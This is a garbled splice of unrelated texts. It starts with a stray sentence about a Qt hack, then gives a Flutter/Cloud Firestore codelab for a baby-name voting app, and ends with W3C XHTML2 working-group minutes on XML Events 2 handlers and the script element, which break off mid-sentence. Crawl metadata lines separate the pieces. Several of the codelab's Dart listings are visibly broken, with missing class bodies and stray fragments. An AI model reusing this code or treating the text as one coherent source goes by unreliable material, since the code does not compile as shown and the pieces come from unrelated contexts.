probably almost guaranteed to work on all future versions of Qt. So it's a hack, but who cares, as long as it works so well and is so easy to implement.
https://forum.qt.io/topic/64825/getting-qmainwindow-to-fit-its-central-widget
CC-MAIN-2018-09
refinedweb
1,217
63.9
If you're familiar with object-oriented programming concepts, you should be able to complete this codelab. You don't need previous experience with Dart, mobile programming, or Firebase; although completing an introductory Flutter codelab first can be helpful. codelab, you'll learn how to create a Flutter app that uses Firebase. The app helps new parents choose baby names by letting friends and family vote for their favorites. Specifically, the app accesses a Cloud Firestore database, and a user action in your app (i.e., tapping a name option) updates the database atomically. Here's what the final app will look like, on both iOS and Android. Yes, you read that right! With Flutter, when you build your app, you can use the same code for both iOS and Android! You might want to watch the 11-minute Using Firestore as a back-end to your Flutter app video that demonstrates building a similar app in real time. It provides a good overview of the steps you'll complete in this codelab. What would you like to learn from this codelab? You need the following software to complete this codelab: - The Flutter SDK (includes Flutter's command-line tools) - An editor (you can use your preferred editor) - Xcode (for iOS development) - Android Studio (for Android development) You can run this codelab using one or more of the following devices: - A physical device (i.e., mobile phone): Android or iOS - The iOS simulator (requires installing Xcode tools) - The Android emulator (requires installing and setup in Android Studio) Follow the Get Started: Test Drive guide to create a new Flutter app. Name the app baby_names instead of flutter_app. The instructions for creating a new Flutter app differ depending on your editor. If you're using an IDE, a new app is usually called a project. If your app is running in your emulator or device, close it before continuing. In your IDE or editor, open the pubspec.yaml file. Add a dependency for cloud_firestore, then save the file. dependencies: flutter: sdk: flutter cloud_firestore: ^0.13.0+1 # new In your IDE, run flutter packages get. Or, from the command line at the top of the project, run flutter packages get to add the Flutter packages. If you get an error, make sure that the indentation in your dependencies block is exactly as shown above, using two spaces (not a tab). (If developing on Android...) Update minSdkVersion Firebase plugins for Flutter on Android require a slightly higher version of the Android SDK than a default Flutter application. If you're developing your application on Android, you'll need to bump its minSdkVersion to 21 for the app to keep compiling after you add the cloud_firestore dependency: - In your IDE or editor, open the android/app/build.gradlefile. Locate the defaultConfigsection, which will contain a minSdkVersionentry, and set it to 21: defaultConfig { ... minSdkVersion 21 # updated minSdkVersion 16 ... } - Save the file - Using the Get Started: Test Drive page as a guide, run the default app in an emulator or on a device. Flutter takes about a minute to build the app. The good news is that this is the last time you'll wait for compilation in this codelab—the rest of your changes will be hot-reloaded. When your app is finished building, you should see the following app: - Using your IDE or editor, open lib/main.dart. This file currently contains the entire code for the default Flutter app. - Delete all of the code in main.dart, then replace it with the following: import 'package:cloud_firestore/cloud_firestore.dart'; import 'package:flutter/material.dart'; void main() => runApp(MyApp()); final dummySnapshot = [ {"name": "Filip", "votes": 15}, {"name": "Abraham", "votes": 14}, {"name": "Richard", "votes": 11}, {"name": "Ike", "votes": 10}, {"name": "Justin", "votes": 1}, ];) { // TODO: get actual snapshot from Cloud Firestore return _buildList(context, dummySnapshot); } Widget _buildList(BuildContext context, List<Map> snapshot) { return ListView( padding: const EdgeInsets.only(top: 20.0), children: snapshot.map((data) => _buildListItem(context, data)).toList(), ); } Widget _buildListItem(BuildContext context, Map data) { final record = Record.fromMap: () => print(record), ), ), ); } }>"; } - Save the file, then hot-reload your app. - If you're using an IDE, just saving the file automatically performs hot-reload. - If you're using an editor, enter rin the command line at the same directory location that you ran flutter run. You should see the following app: The app is currently just a mock. Clicking on names only prints to the console. The next step is to connect this app to Cloud Firestore. Before doing that, you can read about how the code in main.dart is structured. - If you have a Firebase account, sign in to it. If you don't have one, you'll need to create a Firebase account. A free plan is sufficient for this codelab (and most development for most apps). - In the Firebase console, click Add project. - As shown in the screencap below, enter a name for your Firebase project (for example, "baby names app db") and click "Continue". - Next, configure Google Analytics. This codelab doesn't use Analytics, so you can turn it off, then click "Create project". - After a minute or so, your Firebase project will be ready. Click Continue. After you've created a Firebase project, you can configure one (or more) apps to use that Firebase project. All you need to do is: - Register your app's platform-specific ID with Firebase - Generate configuration files for your app, then add them to your project folders If you're developing your Flutter app for both iOS and Android, you need to register both the iOS and Android versions separately within the same Firebase project. If you're just developing for one platform, just skip the unneeded section. In the top-level directory of your Flutter app, there are subdirectories called ios and android. These directories hold the platform-specific configuration files for iOS and Android, respectively. - In the Firebase console, select Project Overview in the left nav, then click the iOS button under "Get started by adding Firebase to your app". You'll see the dialog shown in the following screencap: - The important value to provide is the iOS bundle ID, which you'll obtain using the following three steps. - In the command line tool, go to the top-level directory of your Flutter app. - Run the command open ios/Runner.xcworkspaceto open Xcode. - In Xcode, click the top-level Runner in the left pane to show the General tab in the right pane, as shown in the screencap below. Copy the Bundle Identifier value. - Back in the Firebase dialog, paste the copied Bundle Identifier into the iOS bundle ID field, then click Register App. - Continuing in Firebase, follow the instructions to download the config file GoogleService-Info.plist. - Go back to Xcode. Notice that Runner has a subfolder also called Runner (as shown in the screencap above). - Drag the GoogleService-Info.plistfile (that you just downloaded) into that Runner subfolder. - In the dialog that appears in Xcode, click Finish. - Go back to the Firebase console. In the setup step, click Next, then skip the remaining steps and go back to the main page of the Firebase console. You're done configuring your Flutter app for iOS! - In the Firebase Console, select Project Overview in the left nav, then click the Android button under "Get started by adding Firebase to your app". You'll see the dialog shown in the following screencap: - The important value to provide is the Android package name, which you'll obtain using the following two steps. - In your Flutter app directory, open the file android/app/src/main/AndroidManifest.xml. - In the manifestelement, find the string value of the packageattribute. This value is the Android package name (something like com.yourcompany.yourproject). Copy this value. - In the Firebase dialog, paste the copied package name into the Android package name field. - (Optional) If you plan to use Google Sign In or Firebase Dynamic Links (note that these are not part of this codelab), you need to provide the Debug signing certificate SHA-1 value. Follow the instructions in the Authenticating Your Client guide to find the debug certificate fingerprint value to paste into that field. - Click Register App. - Continuing in Firebase, follow the instructions to download the config file google-services.json. - Go to your Flutter app directory, then move the google-services.jsonfile (that you just downloaded) into the android/appdirectory. - Back in the Firebase console, skip the remaining steps and go back to the main page of the Firebase console. - Finally, you need the Google Services Gradle plugin to read the google-services.jsonfile that was generated by Firebase. - In your IDE or editor, open android/app/build.gradle, then add the following line as the last line in the file: apply plugin: 'com.google.gms.google-services' - Open android/build.gradle, then inside the buildscripttag, add a new dependency: buildscript { repositories { // ... } dependencies { // ... classpath 'com.google.gms:google-services:4.3.3' // new } } - If your app is still running, close and rebuild it to allow gradle to install dependencies. You're done configuring your Flutter app for Android! FlutterFire plugins Your Flutter app should now be connected to Firebase. Flutter provides access to a wide range of platform-specific services, including Firebase APIs and plugins. Plugins include platform-specific code to access services and APIs on iOS and Android. Firebase is accessed through a number of different libraries, one for each Firebase product (for example, databases, authentication, analytics, storage). Flutter provides its own set of plugins to access each Firebase product, collectively called FlutterFire. Be sure to check the FlutterFire GitHub page for the most up-to-date list of FlutterFire plugins. Your Firebase-Flutter setup is finished, and you're ready to start building your app! You'll start by setting up Cloud Firestore and initializing it with some values. - Open the Firebase console, then select the Firebase project that you created during setup. - From the left nav Develop section**,** select **Database**. - In the Cloud Firestore pane, click Create database. - In the Security rules for Cloud Firestore dialog, select Start in test mode, then click Enable. Our database will have one collection, that we'll name "baby". In the collection is where the names and votes are stored. - Click Add Collection, set the collection's name to baby, then click Next. You can now add documents to your collection. Each document has a Document ID, and we'll need to have name and votes fields (as shown in the screencap below). - Enter a baby name using all lowercase letters. In this example, we used dana. - For the existing Field, enter the value of name, select stringfor the Type, then enter the Value of Dana. - Click the Add Field icon to add a second field to contain the number of votes. Select numberfor the Type, then initialize the Value as 0. - Click Save. - Add additional baby names by clicking Add Document. After adding several documents to your collection, your database should look something like this: Our app is now connected to Cloud Firestore! It's time to fetch our collection ( baby) and use it instead of our dummySnapshot object. From Dart, you get the reference to Cloud Firestore by calling Firestore.instance. Specifically for our collection of baby names, call Firestore.instance.collection('baby').snapshots() to return a stream of snapshots. Let's plug that stream of data into our Flutter UI using a StreamBuilder widget. - In your IDE or editor, open lib/main.dart, then find the _buildBodymethod. - Replace the entire method with the following code: Widget _buildBody(BuildContext context) { return StreamBuilder<QuerySnapshot>( stream: Firestore.instance.collection('baby').snapshots(), builder: (context, snapshot) { if (!snapshot.hasData) return LinearProgressIndicator(); return _buildList(context, snapshot.data.documents); }, ); } - The code that you just copy-pasted has a type error. It's trying to pass a list of DocumentSnapshotto a method that expects something else. Find _buildListand change its signature to this: Widget _buildList(BuildContext context, List<DocumentSnapshot> snapshot) { ... Instead of a list of Map, it now takes a list of DocumentSnapshot. - We're almost there. The method _buildListItemstill thinks it's getting a Map. Find the start of the method, then replace it with this: Widget _buildListItem(BuildContext context, DocumentSnapshot data) { final record = Record.fromSnapshot(data); Instead of a Map, you're now taking a DocumentSnapshot, and using the Record.fromSnapshot() named constructor to build the Record. - (Optional) Remove the dummySnapshotfield from the top of lib/main.dart. It's not needed anymore. - Save the file, then hot-reload your app. - If you're using an IDE, just saving the file automatically performs hot-reload. - If you're using an editor, enter rin the command line at the same location that you ran flutter run. After about a second, your app should look like this: You've just read from the database that you created! If you want, you can go to the Firebase console and change the database. Your app will reflect the changes almost immediately (after all Cloud Firestore is a real-time database!). Next you will allow users to actually vote! - In lib/main.dart, find the line that says onTap: () => print(record). Change it to this: onTap: () => record.reference.updateData({'votes': record.votes + 1}) Instead of just printing the record to the console, this new line updates the baby name's database reference by incrementing the vote count by one. - Save the file, then hot-reload your app. Voting is now functional, including the update to the user interface. How does this work? When the user taps the tile containing a name, you are telling Cloud Firestore to update the data of that reference. In turn, this causes Cloud Firestore to notify all listeners with the updated snapshot. As your app is listening through the StreamBuilder implemented above, it's updated with the new data. It's hard to spot when testing on a single device, but our current code creates a subtle race condition. If two people with your app vote at the same time, then the value of the votes field would increase by only one – even though two people voted for the name. This is because both apps would read the current value at the same time, add one, then write the same value back to the database. Neither user would notice anything wrong because they would both see the value of votes increase. It's extremely difficult to detect this problem through testing because triggering the error depends on doing two things inside a very small time window. The value of votes is a shared resource, and any time that you update a shared resource (especially when the new value depends on the old value) there is a risk of creating a race condition. Instead, we can add votes using atomic increment. - In lib/main.dart, find the line that says onTap: () => record.reference.updateData({'votes': record.votes + 1}). Replace it with this: onTap: () => record.reference.updateData({'votes': FieldValue.increment(1)}) - Save the file, then hot-reload your app. Now each vote counts—you removed the race condition. onTap: () => Firestore.instance.runTransaction((transaction) async { final freshSnapshot = await transaction.get(record.reference); final fresh = Record.fromSnapshot(freshSnapshot); await transaction `.update(record.`**`reference`**`, {`**`'votes'`**`: fresh.`**`votes`** `+ 1});` }), How does this work? By wrapping the read and write operations in one transaction, you're telling Cloud Firestore to only commit a change if there was no external change to the underlying data while the transaction was running. If two users aren't concurrently voting on that particular name, the transaction runs exactly once. But if the number of votes changes between the transaction.get(...) and the transaction.update(...) calls, the current run isn't committed, and the transaction is retried. After 5 failed retries, the transaction fails. Here are the final contents of lib/main.dart. import 'package:cloud_firestore/cloud_firestore.dart'; import 'package:flutter/material.dart'; void main() => runApp(MyApp());) { return StreamBuilder<QuerySnapshot>( stream: Firestore.instance.collection('baby').snapshots(), builder: (context, snapshot) { if (!snapshot.hasData) return LinearProgressIndicator(); return _buildList(context, snapshot.data.documents); }, ); } Widget _buildList(BuildContext context, List<DocumentSnapshot> snapshot) { return ListView( padding: const EdgeInsets.only(top: 20.0), children: snapshot.map((data) => _buildListItem(context, data)).toList(), ); } Widget _buildListItem(BuildContext context, DocumentSnapshot data) { final record = Record.fromSnapshot: () => record.reference.updateData({'votes': FieldValue.increment(1)}), ), ), ); } }>"; } Congratulations! You now know the basics of integrating Flutter apps with Firebase. You've learned - How to add Firebase functionality to a Flutter app. - How to connect your app to Cloud Firestore for data syncing. - How to update a Cloud Firestore database atomically. Ready to share your new app with friends? Check out how you can generate platform-specific binaries for your Flutter app (an IPA file for iOS and an APK file for Android). Additional resources For more information on Firebase, see: - Firebase website - Cloud Firestore video - Cloud Firestore documentation - Introductory Firebase codelab (for iOS/Swift) (for Android) You might also find these developer resources useful as you continue working with the Flutter framework: - Flutter website - " What's Revolutionary about Flutter" - Write your first Flutter app codelab - Flutter API reference - Additional Flutter sample apps with source code Here are some ways to get the latest news about Flutter: - Join the flutter-dev and flutter-announce mailing lists - Join the Flutter community on Discord - Follow @flutter.dev on Twitter - Star Flutter on GitHub
https://codelabs.developers.google.com/codelabs/flutter-firebase
CC-MAIN-2021-04
refinedweb
2,889
58.08
MATLAB and Simulink resources for Arduino, LEGO, and Raspberry PiLearn more Opportunities for recent engineering grads.Apply Today New to MATLAB? Hi all. I have a peculiar problem. I am trying to use a java class in Matlab. I have made a very simple java Hello World example: public class HelloWorldApp { public static void main(String[] args) { System.out.println("Hello World!"); // Display the string. } } After compiling (using jdk1.7.0_04 - the 64 bit version), I use the javaaddpath to direct Matlab to the custom class folder, in my case 'c:\temp\javaclass\' so I write: javaaddpath('c:\temp\javaclass\') I then try to create an object Hello = HelloWorldApp() but I get the error Undefined function or variable 'HelloWorldApp'. I have spent hours now trying to figure it out, I've read the tutorial sevaral times, I have tried looking for answers at Mathworks Answers, but nothing has helped so far. Can anyone point out the reason for my failure? I tried your example but I added the path manually to $matlabroot\toolbox\local\classpath.txt (on a new line simply add): C:\java\ Then start MATLAB and check the path with javaclasspath. Finally call HelloWorldApp Warning: A Java exception occurred trying to load the HelloWorldApp class: Java exception occurred: java.lang.UnsupportedClassVersionError: HelloWorldApp : Unsupported major.minor version 51.mathworks.jmi.OpaqueJavaInterface.findClass(OpaqueJavaInterface.java:470) Problem solved: it was a wrong version of the jdk (1.7.0_04). After installing version 1.6.0_31 and compiling again, I was able to add the java object, after adding invoking the javaaddpath command first. Hurray for totally obscurred (non)error messages. That cost me 3 hours of frustration. This technical note shows how to use the latest java version: Indeed, MATLAB uses a 1.6.x version of Java, so you need to use some 1.6.x as well (as you did 1.6.0_31).
http://de.mathworks.com/matlabcentral/answers/37185-cannot-call-java-class-from-matlab
CC-MAIN-2015-18
refinedweb
315
59.3
Odoo Help Odoo is the world's easiest all-in-one management software. It includes hundreds of business apps: CRM | e-Commerce | Accounting | Inventory | PoS | Project management | MRP | etc. How to pass value in context in v8 api coding standard? Hello Everyone, How to pass value(information) in context to access the information passed in conext to callable method? For Example: I have called write method of X object and i want to pass the extra value in context within write method. So, I can get the passed the value vai context in overriden write method of X object. How Can I achive this via v8 API Coding stndard? Regards, Anil. Hi Everyone, Here is the solution for this. You can use with_context to achive this. For Eg: I have browse records for Y object and Now i am calling the write method of relation field of Y object which is X. In simple term I have SO object and Partner object. I have order (sale.order) browe record now I want to update the value of partner so I can directly update the value of partner using order syntaxt :order.partner.with_context(key=value).write({'field':latest updated value.}) EG: sale_order.partner_id.with_context('abc':True).write({'email':'anil.r.kesariya@gmail.com'}) Now, write method of partner will be called and use can access the value from context in overriden write method of partner. which is passed using with_context. you can get the context value in overriden write method like this @api.multi def write(self, vals) ---------------- res = super(res_partner, self).write(vals) self._context.get('abc') ------------------- return res Regards, Anil About This Community Odoo Training Center Access to our E-learning platform and experience all Odoo Apps through learning videos, exercises and Quizz.Test it now
https://www.odoo.com/forum/help-1/question/how-to-pass-value-in-context-in-v8-api-coding-standard-87479
CC-MAIN-2018-17
refinedweb
298
58.08
Agenda See also: IRC log <inserted> scribenick: oeddie <trackbot> Date: 24 October 2008 <Steven> Meeting: XHTML2 WG FtF, Day 2 RM: did you make changes? SM: did RM: in draft dated 20th SM: yes RM: went through list and made some changes ... eventtarget name of changed attribute ... main piece <Steven> <Steven> Forms discussion on XML Events 2 <inserted> ScribeNick: oedipus_laptop SM: added @eventtarget RM: for listeners SM: in general ... thought 2 attribute names i changed RM: other in handler section <Roland_> <Steven> <Steven> XML Events 2 Draft <inserted> ScribeNick: oedipus SM: issue remaining: when are events registered? RM: had an action on that ... when document loaded would be registered and loaded into DOM at that point in time SP: happen before load events? RM: could be tricky SM: reason have to be registered before onLoadEvent fires SP: onLoadEvent may know stuff necessary for document which seems to mean that would have to refire onLoad RM: or protect those looking to load and trigger that way SP: script run when found RM: so could be before <ShaneM> typically you do something like addEvent("load", functionRef) ; SP: script would get run before onLoad ... would't the code implementing XML Events 2 need to wait for onLoad itself in order to initialize SM: no, not if run inline SP: has to run up and down tree to register all listener events ... onLoad, but things depend upon it ... maybe that is its own bootstrap problem RM: if go in through javascript and listen with javascript wouldn't be any different ... listener in script for onLoadEvent would have problem after ... no different from anyone running script using ListenerOnLoad from script interface SM: 2 diff problems: 1) what to say about handlers module and when registered; 2) if implement to work in existing UAs, how would ensure outcome of issue 1 supported ... not sure let decisions about current UAs color the answer ... should say registered prior to onLoadFire SP: yeah RM: yeah but how to achieve? Nick: can do onLoad then trigger all events waiting for onLoad -- order not defined SP: could use root elements ... script implemented can do capture onLoad, initialize, then reinitialize onLoad SM: implementation must behave as if... RM: yes SP: yes RM: such that handlers may listen for onLoad event SM: can't decide where need to say ... in addEventListener description? ... yes RM: makes sense SM: reason for confusion is MarkB says that this also wasn't clear from XML Events 1 spec - SP: not place to do it -- that's an action ... place to talk about it is in the description of handler attribute ... i think should be under handler attribute RM: defined on listener element - optional attribute? SP: yes ... (reads from spec) ... could do in separate location: whenever handler attached explicitly with handler attribute or implicitly RM: problem saying that - what happens when try to add handler after - brining script into DOM ... 2 sides: 1) those that are declared in original document will be done before load SP: discussed before and said that can't do that RM: should ignore that situation SP: little point in changing handler attribute via script - if want that effect, can use script already RM: if put widget in DIV, need assertion -- can't bring in declarative approach to do that SM: any DOM mutation event should cause the implementation to reexamine tree to ensure all handlers are registered SP: are you REALLY sure we want that SM: alternative is build page using AJAX -- if want to work, has to work there too SP: not sure -- whole point of this markup was to do declaratively so didn't have to use script; if going to use script, use script's function, not declarative markup RM: may not know if embedded at start-up time or post load SM: that's my concern too ... don't disagree with SP, but don't know how to accomodate those creating dynamic pages -- added after onLoadEvent fires RM: could say or provide function to do it - if do insert after mnode, have to do something to reparse and register these items ... responsibility, not dogma SM: address in document conformance? ... or just advice ... more than advice -- have to do it RM: have to cause script to get executed in some way to get activated SM: popular AJAX libraries do it by setting flag for javascripting process RM: need something similar here SM: where in doc? RM: processing model, isn't it? ... make topic in subsection 3 - subject of how to cause listeners to be registered SM: 3.6? ... after event scope RM: yep SM: don't need to do in real time - will edit and we can revisit RM: changed to make eventtarget SM: other is EventType RM: other thing that makes sense in this section now -- had scripting module, but also discussion if want handler and a script - this script is a "traditional" script inside handler module scribeNick+ oeddie SM: script element that would say "here are my handlers" RM: script that is only a function ... add script for all reasons have today SM: reluctant to loose section 5 - no home other than XHTML2 today RM: keep in there; will review MarkB's issues with Mark - question: define handler or function - function takes to script handler to handler <alessio> hi all, I don't have Skype here... can I follow you via IRC? RM: reviewing minutes and email from july of, course, you are welcome in any way you can participate <alessio> thx! RM: shane also included in dialog <Roland_> SM: handler element included in handler module, right? RM: yes SP: where is handler element now? SM: doesn't exist RM: trying to move from script SM: load external things - has @src SP: handler element versus action element SM: if action element had @src could fulfil function RM: leave resources tight SM: don't want to overload action -- just use handler -- make simpler - doesn't cost anything to have in content model RM: inside action, put handler ... handler can be child of action SM: doesn't have to be RM: but valid cases where one might want to ... other change: option of either specifying want handler to run or function to run; where specify handler and where function? SM: Roland, do you want @implements on handler element? GJR: can "see" argument for it, perhaps in case of expert handlers RM: trying to think of a reason to say no -- seems might confuse things ... depends upon script - script in 2 diff modules - events module, handlers moule, and script module ... just section in XHTML2 -- need script out of events module document altogether SM: case for retention: XML module, not XHTML module; beyond XHTML; like to expose script element to world beyond XML RM: agree with that statement; bit we need to work on is what script element says -- XML2 script element different in terms of coding, etc. SM: not really different - tried to normalize RM: when i looked were definitely differences between Base and Events ... let's finish of the other piece: option to specify handler (ID) or function SM: suggesting that be global attribute? RM: wherever can specify handler, can specify function SM: yes ... we need to keep in mind that everytime add global attribute, polluting global namespace more RM: under handler as IDREF? SM: now a URI SP: lost use case -- what trying to achieve RM: either a handler or script library with all functions ... get functions from script <Steven> <a href=..><action ev:foobar()</action>Click here</a> RM: suggesting that could be name of function ... how if going to attach to handler SP: action element is a handler ... used default <Steven> <action id="foo">foobar()</action> <Steven> <a ev:event="DomActivate" handler="foo" href=...>Click here</a> <Roland_> < listener RM: instead of handler, have to create actionable which has to call function - can't refer to handler from function SM: like elegance of SP's solution, but entire module has no inline CDATA SP: even action? SM: even action SP: replae with script element s/relae/replace SM: don't know if will work <Steven> instead of action above <Steven> couldn't I say SP: instead of action above, couldn't i say: <Steven> <script declare="declare" id="foo">foobar()</script> SP: question is: how much / often the work that handler does is single function -- this is convenience, not functionality - author convenience to call function RM: interpretation will be different depending upon culture coming from TV: what gets loaded and fired; ???? ouldn't hear reast ... data model RM: earlier example in spec: listener > DOMActivate > doit function in script what put there? ... if have script function called doit, would have to create intermediary - that would be handler? SP: or script SM: all done is add layer of abstraction; still can't get to single function SP: in my script core is that single function RM: wouldn't execute, though SP: would handler=#foo content of scrpt gets executed RM: what would happen today SP: declare SM: no such element <ShaneM> defer [CI] When set, this boolean attribute provides a hint to the user agent that the script is not going to generate any document content (e.g., no "document.write" in javascript) and thus, the user agent can continue parsing and rendering. SM: is attribute "defer" - hints that not going to do DocumentWrite() ... have @declare on action element SP: not sure why TV: no way to tell UA not to execute piece of script; RM: what led to suggestion of adding function ... still have way of action invoke function ... actionhas function equals -- then no need of another parameter TV: will some of these things have effect on ???? ... 2 - one depends on function that came from ???? ... respect to javascript node - if script tag has src that gets loaded - trick to make load is do Document.Create element; do things need to block or can execution/loading of document continue ... all happen after onLoadEvents fire; if have 2 blocks 1 dependent upon quote from first block, have to find these and define behavior carefully SM: makes perfect sense ... discussing handler element - decided to introduce; then discussed if needed function attribute as part of global attribute set; now keep handler and that handler can invoke function ... separate modules - XML Events does not require XML Handlers TV: would like to keep separate if possible GJR: plus 1 SM: +1 ... no way to use listener that ties to a function RM: handler is always a function could be specified in a language TV: other way to fix - declare one of things in XML Events to be a handler (such as the handler) - handler spec can elaborate on that; XML Events client that doesn't support handler can use module RM: handler goes to events goes to listener SM: another option: @handler doesn't get included into global space unless use events as well TV: handler in handler module GJR: like way headed RM: need to work out specifics - still question - handler attribute to invoke a script function SM: also backwards compat - events 1 ... happy to define handler element in context of Event Module SP: in Events 1 did diliberately to try and get others to adopt XML Events TV: Charlie, is there a voice group position on this? SP: other groups think our events are special; almost always turns out that they have relevance or something close to it in XForms terms where events don't fire handlers on parts of tree that are irrelevant TV: event filtering SP: interesting; no other spec talks about relavance like that, amybe ought to put into spec; SMIL good example TV: also gets by argument that need to implement a lot of what i don't need to get what i do need SP: 2 implements: how do you deal with relavance specially ... how stop events firing on tree where shouldn't Charlie: handlers decide what to do SP: switch that contains element bound to something that changes, but switch not told; strictly speaking, events so go to that thing and bubble up tree, but currently doesn't Uli: in Chiba does TV: no one should notice bubble on client side ... about 5 years ago had a partial implementation ... event list in XML: can say to handler, fire event under certain criterion -- i am done, don't do anymore ... could could use XML handler to do conditionality -- if x is true through attributes, then relevant, otherwise, not ... target phase, bubble phase or capture phase all should respect conditionality of XML handler RM: conclusion / agreement RESOLUTION: take handler out, put into Events Module, ability to invoke script function will be added to handler GJR: plus 1 <ShaneM> +1 BREAK FOR 30 MINUTES <alessio> +1 i/Attendees/Previous: i/see also/Previous: <ShaneM> omw <ShaneM> listener says handler="#foo" <ShaneM> <handler src="whatever" /> <ShaneM> <handler src="whatever#someActionElement" /> <Roland_> < handler GJR: like function better <ShaneM> <handler src="whatever.js" type="application/javascript" function="whatever" /> SM: trying to understand what means; using examnple above, the symptom is going to do what? load the resource at whatever, find the fragment identified by #someActionElement -- doesn't make sens <Roland_> <handler src="whatever#someActionElement" /> <ShaneM> <handler id="myhandler" src="whatever.js" type="application/javascript" function="whatever" /> SP: not sure about that <Roland_> <handler id="foo" src="whatever#someActionElement" /> SM: this is case trying to solve, right? SP: yes SM: guess i'm fine with that - would be as easy to put function on listener and be done with it ... handler module describes action element and way to declaratively define handlers <ShaneM> <handler id="myhandler" src="#someActionElement" /> RM: doesn't explain in XML Events 1 SM: has to be embedded? SP: easy to put function on listener, so what is problem RM: do we want another global attribute -- wherever a handlers attribute there would be a function SM: hoping to come up with clever way to overload handler <ShaneM> handler="javascript:function" RM: one is fragment identifier - URI or function name SM: that would work today, for what it is worth RM: wouldn't have to put javascript, name of function SP: URI, not CURIE RM: function: would also be URI SP: then have to go to IETF SM: not a formal javascript SP: convention <Steven> javascript:alert("foo") SM: used for href="javascript..." SP: Bjoern Hoehrmann to register schemes widely used and not registered anywhere -- ran out of time or cycles RM: function name with brackets <Roland_> tried-javascript-scheme-00 RM: why not use SM: TAG would have heart-attack RM: get through LC and put in example SP: Shane, your example is very clever - would never have come up with that RM: someone might take this scheme trhough for all we know SM: what happens with such a function: get past event context or part of global javascript feed RM: as per SP's example SP: what has TAG against it -- that not registered? SM: TAG doesn't like registering new schemes - want to use HTTP ... WebAPI group defining widget spec - so could register in DIV - TAG said no; external group (OASIS) tried to register XIT to IETF, failed <ShaneM> Would this work? foo.js#functionName ? SP: TAG objects to schemes which are just HTTP in disguise - apple has one, and just use it ... replace scheme with http still works SM: within iPhone architecture itself - when install app, can register scheme js#functionName SP: as handler you know # defined by media type - application/javascript ... then need to look there to find out if can use fragments <Steven> Scripting Media Types SM: could put function attribute on it and be done with it RM: go back to what trying to achieve SM: 99% of today's use cases, @function would satisfy; could put in note that can do with handler at some time in future, but probably want to stay away from that SP: safest route is another attribute SM: clearest for constituents GJR: plus 1 RM: sounds good to me SM: having said all that, do we still need handler element? SP: don't think so SM: MarkB thinks so -- he introduced this thread SP: would have to ask Mark SM: does anyone believe that any scripting language used other than javascript? <ShaneM> Is this adequate? <dt id="attr-listener-function">function</dt> <ShaneM> <dd>The <code>function</code> attribute identifies an optional <ShaneM> function name that will be called when the handler is invoked by <ShaneM> an event listener.</dd> SP: think that in 15 years time, maybe - wrong to make assumption that will always predominate ... not sure if need handler and function simultaneously SM: function called when the event reaches observer SP: yes SM: think have to say specify either a handler or a function attribute, and if specify both @function takes precedence RM: sounds good to me GJR: plus 1 <alessio> for me too... +1 RM: function doesn't require javascript - can use other function libraries/languages RESOLUTION: specify either a handler or a function attribute; if specify both @function takes precedence SM: have abstraction built-into spec, don't know if will ever be used RM: same as in XML Events only with @function added SM: so XML Script Element RM: why would it not be XHTML 1.1 or 1.2 Script Element + Implements? SM: modules designed to move cleanly into XHTML2; in XHTML2 have broader understanding of i18n; don't care if do differently in Script Module, but going to have to change when move to XHTML2 <Steven> s/of nothing/no problem/ <ShaneM> SM: can do now or later ... HTML4.01 script that we care about <alessio> thx steven <Steven> :-) SM: @type in HTML4 is much diff than @type in XHTML2 ... didn't put defer in here, but could ... is what we are trying to accomplish is that this script looks like HTML 4.01 script + implements RM: yes, so can implment in existing browsers SM: if that is case, we shouldn't have complex def of @type in here ... Steven, XML Events 2 right now uses definitions from XHTML2 SP: XHTML2 has extended version of @type, but if another app going to use XML Events may not want that def of @type ... no objection to XML Events 2 having simpler @type as long as doesn't ruin generic @type in XHTML2 ... M12n allows us to extend an attribute, right SM: sure ... if agree to change, will rip out complex content-type lang and replace with stuff from HTML4.01 RM: @id element? SM: everything has @id in XHTML RM: id or xml:id SM: interesting discussion we should have ... if goal is this is used generically in XML languages, would make sense to remove @id from this spec, which is used in context of other host languages RM: agree SP: everyone uses @id -- allow people to use other attributes -- don't want to replicate problem with XFOrms where assumed that host language would define @id, in the end had to put it back in RM: would be legitimate - don't have to use javascript if have @function ... do we know what we are doing with script SM: believe so -- trying to find definition of @id <alessio> @id could be still useful as immediate "pointer" for an element SM: plan with document? RM: go through changes, review and take to LC SM: think inherited from HTML 4.01 RM: add to XHTML 1.2? SM: no SP: text def of id is attribute that assigns an identifier to element SM: taking high-level details <ShaneM> <dd>The optional id attribute assigns an identifier to an element. The value of this attribute must be unique within a document. This attribute MUST NOT be specified on an element in conjunction with the xml:id attribute.</dd> SM: makes sens to mention xml:id here in regards scripting ... coding versus charset - what do we want to do? RM: XHTML 1.0 says what? SM: changed for XHTML2 in response to comment from i18n SP: could leave in encoding ... encoding only for the src attribute SM: wants to map cleanly to script in HTML 4.01 SP: 2 options: leave; include both to allow for future developments; or just add in XHTML2 RM: add in XHTML2 and deprecate old one SM: put in note: "in future version of module expect to change base encoding..." RM: don't know what value that adds other than to melt minds SM: ok ... now have: @src, @type, @implements - do we need @defer? think has no semantics and should skip RM: if have no use for it, leave it out ... is in XHTML 1.0? SP: everything in 1.0 RM: XHTML 1.1? <alessio> @SM I agree SM: in 1.1 RM: same as 1.1 with addition of @implements - XHTML2 script element RESOLUTION: keep everything from XHTML 1.0 definition of script RM: finished topic? SM: think so RM: topic haven't addressed: now that have M12n as Rec need to update other specs - can we discuss after lunch -- fallout from getting M12n to Rec SM: pretty sure in all in mail <Roland_> Now that XHTML M12N 1.1 is a REC, we need to update our other specs. <Roland_> There are new versions in shape for PER that include the schema <Roland_> implementations. They include XHTML 1.1, XHTML Basic 1.1, XHTML Print <Roland_> 1.0, and RDFa Syntax 1.0. We should decide a strategy for moving these <Roland_> forward. SP: Basic, Print, and RDFa RM: 1.1 Second Edition SM: will all be second edition RM: 1.1 SE has been waiting for M12n for quite a while ... strategy? SP: add reference and shove out there SM: updated all drafts as SE and are all ready to go SP: way to go Shane! SM: think these are PERs per W3C process SP: that's right SM: can't imagine any real contention or difficulty in moving forward; ... check errata to ensure all addressed; ... RDFa synax odd man out; asked melinda to ask XHTML Print comminity for errata; Print, Basic and XHTML 1.1 we can submit as single submission: same style of change, etc. RM: seems reasonable: M12n is underpinning ... Basic so new, don't think there is errata for that yet ... www-html-editor where to find errata? SM: yep RM: fun for the whole family... SM: RDFa Syntax unusual - produced in conjunction with another group in Task Force - up to TF to decide to take to PER? ... my guess is ben will want to do a stability check on it first ... W3C process questions for SP: Basic, Print, and XHTML 1.1 SP: if errata, work in, add schemas and then submit SM: submit all in one transition call SP: best approach SM: concerned about tracking errata -- need to do a sweep of www-html-editor for the last 5 years SP: can garuntee that when producing 